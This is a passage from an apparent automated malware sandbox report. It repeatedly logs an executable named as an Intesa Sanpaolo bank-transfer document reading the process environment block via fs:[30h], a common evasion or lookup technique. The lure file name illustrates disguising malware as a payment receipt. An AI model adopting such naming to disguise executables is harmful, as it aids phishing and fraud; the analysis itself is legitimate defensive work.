          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E27ED mov eax, dword ptr fs:[00000030h]6_2_010E27ED
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E27ED mov eax, dword ptr fs:[00000030h]6_2_010E27ED
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114E7E1 mov eax, dword ptr fs:[00000030h]6_2_0114E7E1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C47FB mov eax, dword ptr fs:[00000030h]6_2_010C47FB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C47FB mov eax, dword ptr fs:[00000030h]6_2_010C47FB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01102619 mov eax, dword ptr fs:[00000030h]6_2_01102619
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E609 mov eax, dword ptr fs:[00000030h]6_2_0113E609
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C262C mov eax, dword ptr fs:[00000030h]6_2_010C262C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE627 mov eax, dword ptr fs:[00000030h]6_2_010DE627
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F6620 mov eax, dword ptr fs:[00000030h]6_2_010F6620
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F8620 mov eax, dword ptr fs:[00000030h]6_2_010F8620
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DC640 mov eax, dword ptr fs:[00000030h]6_2_010DC640
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA660 mov eax, dword ptr fs:[00000030h]6_2_010FA660
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA660 mov eax, dword ptr fs:[00000030h]6_2_010FA660
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118866E mov eax, dword ptr fs:[00000030h]6_2_0118866E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118866E mov eax, dword ptr fs:[00000030h]6_2_0118866E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F2674 mov eax, dword ptr fs:[00000030h]6_2_010F2674
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4690 mov eax, dword ptr fs:[00000030h]6_2_010C4690
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4690 mov eax, dword ptr fs:[00000030h]6_2_010C4690
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FC6A6 mov eax, dword ptr fs:[00000030h]6_2_010FC6A6
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F66B0 mov eax, dword ptr fs:[00000030h]6_2_010F66B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]6_2_010FA6C7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA6C7 mov eax, dword ptr fs:[00000030h]6_2_010FA6C7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E6F2 mov eax, dword ptr fs:[00000030h]6_2_0113E6F2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E6F2 mov eax, dword ptr fs:[00000030h]6_2_0113E6F2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E6F2 mov eax, dword ptr fs:[00000030h]6_2_0113E6F2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E6F2 mov eax, dword ptr fs:[00000030h]6_2_0113E6F2
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011406F1 mov eax, dword ptr fs:[00000030h]6_2_011406F1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011406F1 mov eax, dword ptr fs:[00000030h]6_2_011406F1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114C912 mov eax, dword ptr fs:[00000030h]6_2_0114C912
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8918 mov eax, dword ptr fs:[00000030h]6_2_010B8918
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8918 mov eax, dword ptr fs:[00000030h]6_2_010B8918
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E908 mov eax, dword ptr fs:[00000030h]6_2_0113E908
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113E908 mov eax, dword ptr fs:[00000030h]6_2_0113E908
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114892A mov eax, dword ptr fs:[00000030h]6_2_0114892A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0115892B mov eax, dword ptr fs:[00000030h]6_2_0115892B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01140946 mov eax, dword ptr fs:[00000030h]6_2_01140946
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114C97C mov eax, dword ptr fs:[00000030h]6_2_0114C97C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E6962 mov eax, dword ptr fs:[00000030h]6_2_010E6962
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E6962 mov eax, dword ptr fs:[00000030h]6_2_010E6962
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E6962 mov eax, dword ptr fs:[00000030h]6_2_010E6962
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01164978 mov eax, dword ptr fs:[00000030h]6_2_01164978
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01164978 mov eax, dword ptr fs:[00000030h]6_2_01164978
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110096E mov eax, dword ptr fs:[00000030h]6_2_0110096E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110096E mov edx, dword ptr fs:[00000030h]6_2_0110096E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0110096E mov eax, dword ptr fs:[00000030h]6_2_0110096E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C09AD mov eax, dword ptr fs:[00000030h]6_2_010C09AD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C09AD mov eax, dword ptr fs:[00000030h]6_2_010C09AD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011489B3 mov esi, dword ptr fs:[00000030h]6_2_011489B3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011489B3 mov eax, dword ptr fs:[00000030h]6_2_011489B3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011489B3 mov eax, dword ptr fs:[00000030h]6_2_011489B3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D29A0 mov eax, dword ptr fs:[00000030h]6_2_010D29A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118A9D3 mov eax, dword ptr fs:[00000030h]6_2_0118A9D3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011569C0 mov eax, dword ptr fs:[00000030h]6_2_011569C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA9D0 mov eax, dword ptr fs:[00000030h]6_2_010CA9D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA9D0 mov eax, dword ptr fs:[00000030h]6_2_010CA9D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA9D0 mov eax, dword ptr fs:[00000030h]6_2_010CA9D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA9D0 mov eax, dword ptr fs:[00000030h]6_2_010CA9D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA9D0 mov eax, dword ptr fs:[00000030h]6_2_010CA9D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA9D0 mov eax, dword ptr fs:[00000030h]6_2_010CA9D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F49D0 mov eax, dword ptr fs:[00000030h]6_2_010F49D0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114E9E0 mov eax, dword ptr fs:[00000030h]6_2_0114E9E0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F29F9 mov eax, dword ptr fs:[00000030h]6_2_010F29F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F29F9 mov eax, dword ptr fs:[00000030h]6_2_010F29F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114C810 mov eax, dword ptr fs:[00000030h]6_2_0114C810
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116483A mov eax, dword ptr fs:[00000030h]6_2_0116483A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116483A mov eax, dword ptr fs:[00000030h]6_2_0116483A
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2835 mov eax, dword ptr fs:[00000030h]6_2_010E2835
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2835 mov eax, dword ptr fs:[00000030h]6_2_010E2835
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2835 mov eax, dword ptr fs:[00000030h]6_2_010E2835
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2835 mov ecx, dword ptr fs:[00000030h]6_2_010E2835
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2835 mov eax, dword ptr fs:[00000030h]6_2_010E2835
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E2835 mov eax, dword ptr fs:[00000030h]6_2_010E2835
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA830 mov eax, dword ptr fs:[00000030h]6_2_010FA830
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D2840 mov ecx, dword ptr fs:[00000030h]6_2_010D2840
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4859 mov eax, dword ptr fs:[00000030h]6_2_010C4859
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4859 mov eax, dword ptr fs:[00000030h]6_2_010C4859
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F0854 mov eax, dword ptr fs:[00000030h]6_2_010F0854
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01156870 mov eax, dword ptr fs:[00000030h]6_2_01156870
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01156870 mov eax, dword ptr fs:[00000030h]6_2_01156870
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114E872 mov eax, dword ptr fs:[00000030h]6_2_0114E872
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114E872 mov eax, dword ptr fs:[00000030h]6_2_0114E872
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114C89D mov eax, dword ptr fs:[00000030h]6_2_0114C89D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0887 mov eax, dword ptr fs:[00000030h]6_2_010C0887
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EE8C0 mov eax, dword ptr fs:[00000030h]6_2_010EE8C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FC8F9 mov eax, dword ptr fs:[00000030h]6_2_010FC8F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FC8F9 mov eax, dword ptr fs:[00000030h]6_2_010FC8F9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118A8E4 mov eax, dword ptr fs:[00000030h]6_2_0118A8E4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113EB1D mov eax, dword ptr fs:[00000030h]6_2_0113EB1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEB20 mov eax, dword ptr fs:[00000030h]6_2_010EEB20
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEB20 mov eax, dword ptr fs:[00000030h]6_2_010EEB20
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01188B28 mov eax, dword ptr fs:[00000030h]6_2_01188B28
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01188B28 mov eax, dword ptr fs:[00000030h]6_2_01188B28
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01168B42 mov eax, dword ptr fs:[00000030h]6_2_01168B42
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01156B40 mov eax, dword ptr fs:[00000030h]6_2_01156B40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01156B40 mov eax, dword ptr fs:[00000030h]6_2_01156B40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118AB40 mov eax, dword ptr fs:[00000030h]6_2_0118AB40
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BCB7E mov eax, dword ptr fs:[00000030h]6_2_010BCB7E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0BBE mov eax, dword ptr fs:[00000030h]6_2_010D0BBE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0BBE mov eax, dword ptr fs:[00000030h]6_2_010D0BBE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0BCD mov eax, dword ptr fs:[00000030h]6_2_010C0BCD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0BCD mov eax, dword ptr fs:[00000030h]6_2_010C0BCD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0BCD mov eax, dword ptr fs:[00000030h]6_2_010C0BCD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E0BCB mov eax, dword ptr fs:[00000030h]6_2_010E0BCB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E0BCB mov eax, dword ptr fs:[00000030h]6_2_010E0BCB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E0BCB mov eax, dword ptr fs:[00000030h]6_2_010E0BCB
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116EBD0 mov eax, dword ptr fs:[00000030h]6_2_0116EBD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114CBF0 mov eax, dword ptr fs:[00000030h]6_2_0114CBF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEBFC mov eax, dword ptr fs:[00000030h]6_2_010EEBFC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8BF0 mov eax, dword ptr fs:[00000030h]6_2_010C8BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8BF0 mov eax, dword ptr fs:[00000030h]6_2_010C8BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8BF0 mov eax, dword ptr fs:[00000030h]6_2_010C8BF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114CA11 mov eax, dword ptr fs:[00000030h]6_2_0114CA11
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEA2E mov eax, dword ptr fs:[00000030h]6_2_010EEA2E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA24 mov eax, dword ptr fs:[00000030h]6_2_010FCA24
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA38 mov eax, dword ptr fs:[00000030h]6_2_010FCA38
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E4A35 mov eax, dword ptr fs:[00000030h]6_2_010E4A35
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E4A35 mov eax, dword ptr fs:[00000030h]6_2_010E4A35
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0A5B mov eax, dword ptr fs:[00000030h]6_2_010D0A5B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D0A5B mov eax, dword ptr fs:[00000030h]6_2_010D0A5B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6A50 mov eax, dword ptr fs:[00000030h]6_2_010C6A50
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA6F mov eax, dword ptr fs:[00000030h]6_2_010FCA6F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA6F mov eax, dword ptr fs:[00000030h]6_2_010FCA6F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCA6F mov eax, dword ptr fs:[00000030h]6_2_010FCA6F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113CA72 mov eax, dword ptr fs:[00000030h]6_2_0113CA72
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0113CA72 mov eax, dword ptr fs:[00000030h]6_2_0113CA72
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
